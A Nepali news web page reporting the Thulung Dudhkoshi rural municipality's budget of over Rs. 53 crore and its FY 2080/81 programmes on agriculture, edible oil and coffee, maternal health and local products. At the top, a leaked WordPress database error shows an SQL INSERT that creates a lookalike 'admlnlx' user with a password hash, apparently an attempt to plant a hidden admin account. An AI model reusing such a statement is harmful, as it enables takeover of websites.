WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXxreMXnUYdJ4jxyna6IlJF0gr23JG0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 13:46:25', '', 'admlnlx', 'admlnlx')

थुलुङदुधकोशी गाउँसभा सम्पन्न, सामाजिक तथा आर्थिक विकासमा जोड – Gaule Khabar

थुलुङदुधकोशी गाउँसभा सम्पन्न, सामाजिक तथा आर्थिक विकासमा जोड

रु.५३ करोड बढीको बजेट पेश

थुलुङदुधकोशी गाउँसभा सम्पन्न, सामाजिक तथा आर्थिक विकासमा जोड

सोलुखुम्बु । जिल्लाको थुलुङ दुधकोशी गाउँपालिकाले सामाजिक तथा आर्थिक विकासलाई पहिलो प्राथमिकतामा राखि आगामी आर्थिक वर्षका लागि रु.५३ करोड बढीको बजेट पेश गरेको छ ।

आज (आइतबार) सम्पन्न दोस्रो गाउँसभाको तेस्रो अधिवेशनमा कुल रु.५३ करोड ९३ लाख ४९ हजार ४ सय ७३ रुपैयाँ बजेट पेश गरिएको हो ।

आर्थिक वर्ष २०८०/०८१ मा आयतर्फ संघीय सरकार समानीकरण अनुदान रु. १२ करोड २५ लाख, सशर्त अनुदान रु. २६ करोड ३० लाख, राजस्व बाँडफाँड रु. ८ करोड ३८ लाख ६९ हजार ७ सय, समपुरक अनुदान रु.१ करोड ३० लाख र विशेष अनुदान रु.१ करोड २५ लाख हुने अनुमान गरिएको छ ।

यस्तै प्रदेश सरकार समानीकरण अनुदान रु. ७८ लाख ३३ हजार, सर्शत अनुदान रु.६४ लाख ५० हजार, समपुरक अनुदान रु. १ करोड र राजस्व बाँडफाँड रु. २९ लाख ८ हजार आम्दानी हुने अनुमान गरिएको छ । गाउँपालिका प्रवक्ता भोजराज कार्कीका अनुसार आन्तरिक आय रु.१ करोड ४२ लाख ८८ हजार ७ सय, ७३ गत वर्षको अल्या रु.३० लाख गरि कुल रु. ५३ करोड ९३ लाख ४९ हजार ४ सय ७३ को बजेट पेश गरिएको हो ।

आर्थिक वर्ष २०८०/०८१ को नीति तथा कार्यक्रम पारित
आगामी आर्थिक वर्ष २०८०/०८१ को नीति तथा कार्यक्रम गाउँसभाले पारित गरेको छ । आर्थिक विकास तथा सामाजिक क्षेत्रलाई पहिलो प्राथमीकता राखेको नीति तथा कार्यक्रम कृषि, पर्यटन, शिक्षा, स्वास्थ्य लगायत क्षेत्रलाई समेत उत्तीकै स्थान दिएको छ ।

गाउँ विकास सहकारी गठन देखि बाली बिमा सम्मका कार्यक्रम
गाउँपालिका उपाअध्यक्ष सविता राईले पेश गर्नुभएको नीति तथा कार्यक्रममा सामाजिक तथा आर्थिक विकासको कार्यक्रमलाई प्राथमिकता दिइएको छ । उक्त नीति तथा कार्यक्रममा कृषकहरुको उत्पादनको समर्थन मूल्य तोकि बढि भएका उत्पादन खरिद गर्ने, गाउँ विकास सहकारी गठन गरि पालिका अन्तर्गतका किषकहरुलाई सहुलियत कर्जा उपलब्ध गराउने, साथै नीजि, सरकारी तथा सहकरीको माध्यमबाट उत्पादन वृद्धि, रोजगारी सृजना तथा दीगो बिकासका कार्यक्रम सन्चालन गर्ने कार्यक्रम समावेश गरिएको छ ।
कृषकलाई खेतीबालीमा आकर्षित गर्नको लागि मुख्य बालीहरुको पालिकाले बीमा गरिदिने भएको छ । पालिकाभित्रका सबै वडाहरुमा किसानका मुख्य बालीहरुको निशुल्क बीमा गर्नको लागि आवश्यक बजेट समेत व्यवस्था गरिएको गाउँपालिका प्रवक्ता भोजराज कार्कीले जानकारी दिए ।

खाने तेल र कफिमा आत्मनिर्भरको लक्ष्य
गाउँपालिकाले खाने तेल र कफीमा आत्मनिर्भर बन्ने नीति लिएको छ । कफी र खाने तेल आयतमा रोक लगाउने सम्मको कार्यक्रम राखिएको छ ।
आयातित खाने तेल स्वास्थ्यका लागि हानिकार हुनका साथै गाउँभित्रको करोडौँ बजेट बाहिरिने भएकाले तेलमा आत्मनिर्भर बन्ने नीति लिइएको गाउँपालिका अध्यक्ष असिम राईले बताए ।
वार्षिक रु.९ करोड बराबरको खाने तेल आयत हुने गाउँपालिका संग पारम्भिक तथ्याङ्क रहेको पालिका प्रवक्ता भोजराज कार्कीले जानकारी दिनुभयो । खाने तेल आयत रोक्नको लागि अघिल्लो वर्ष देखिनै तोरी सहित तेलहन खेती बालीमा अनुदानको व्यवस्था गरिएको पालिकाले जनाएको छ ।
यस वर्ष पनि तोरी, सूर्यमुखी, फिलुङ्गी लगायतको बालीमा प्रोत्साहनको कार्यक्रम राखिएको बताइएको छ । उपयुक्त स्थानमा तोरी मिल स्थापना गरि उत्पादित तेलको लेबलीङ देखि प्याकिङ समेत गरिने कार्यक्रममा उल्लेख छ ।

कृषकलाई रोजगारी संगै आम्दानीमा जोड्ने उदेश्यले कफीमा आत्मनिर्भर बनाइने नीति अबलम्बन गरिएको छ । जसको लागि पालिका भित्र उत्पादन भएको कफी सरकारले खरिद गरि आवश्यक प्रसोधन संगै बजारीकरण समेत गरिने बताइएको छ ।

सुत्केरी तथा गर्भवती महिलाका लागि निशुल्क एम्बुलेन्स सेवा
गाउँपालिकाले गुणस्तरीय स्वास्थ्य सेवालाई पनि प्राथमीकतामा राखेर कार्यक्रम निर्माण गरेको छ । नागरिकबाट संकलन गरिएको सहयोग मार्फत सञ्चालित दुधकोशी अस्पताललाई थप व्यवस्थित बनाई MDGP डक्टर सहितको विशिष्ट स्वास्थ्य सेवा प्रवाह गर्ने उक्त नीति तथा कार्यक्रमले समेटेको छ ।

स्वास्थ्य बीमा कार्यक्रमलाई समेत जोड दिइने छ भने गर्भवती तथा सुत्केरी महिला सहित जेष्ठ नागरिकका लागि निशुल्क एम्बुलेन्स सेवा सञ्चालन गर्ने भएको छ । मान्यता प्राप्त अस्पतालमा नियमीत स्वास्थ्य जाँच गर्ने गर्भवती महिलालाई जनही रु.३ हजार ५ सय र अन्यत्र पठाउँनुपरेमा जनही रु.५ हजार दिने लगायतको कार्यक्रम सञ्चालन गरि मातृमृत्युदर सून्यमा झारेको गाउँपालिकाले आगामी वर्ष देखि एम्बुलेन्स सेवा निशुल्क दिने कार्यक्रम राखेको छ ।

रोजगारी सृजनाका लागि स्थानीय उत्पादनमा जोड
आगामी आर्थिक वर्षमा थुलुङ दुधकोशीले स्थानीय उत्पादनलाई जोड दिदै रोजगारी सृजना गर्ने नीति लिएको छ । जसको लागि खादामाला र ब्याजको प्रयोग कम गर्दै स्थानीय कच्चा पदार्थको प्रयोगबाट बनाइएका फुर्का, ङिमारी तथा धजुराको अधिक्तम प्रयोग गरिने कार्यक्रममा उल्लेख छ ।
स्थानीय सीप तथा कच्चा पदार्थ प्रयोग गरि आय आर्जनका कार्यक्रम सन्चालन गर्ने, साना तथा मझौला उद्योग सन्चालन गर्ने तथा कृषिजन्य उद्योगहरु सन्चालन गर्ने व्यक्ति तथा फर्महरुलाई परियोजनामा आधारित अनुदान प्रदान गर्ने नीति तथा कार्यक्रम रहेको गाउँपालिका प्रवक्ता भोजराज कार्कीले जानकारी दिए ।

हरियाली वातावरण निर्माण देखि पर्यटन प्रवद्र्धनका कार्यक्रम

एक वडामा कम्तिमा १०० बिरुवा अनिवार्य रोप्ने र डाँडाखर्क, सुकेपोखरी, जालिम मन्दिर, घुम्नेपानी काँगेल डाँडा लगायत हरेक वडाको शीरमा पोखरी चभअजबचनभ उयलम खन्ने तथा सिम्सार क्षेत्र संरक्षण गर्ने नीति अवलम्बन गर्ने कार्यक्रम समावेश गरीएको छ ।
यस्तै, थुलुङ दुधकोसीमा ल्याब सेवा सहितको भेटनरी अस्पताल बनाउन अन्तर सरकारहरु सङ्ग समन्वय गर्ने, ज्येष्ठ हेरचाह केन्द्र स्थापना गर्ने लगाायतको कार्यक्रमम रहेको प्रवक्ता कार्कीले बताए ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका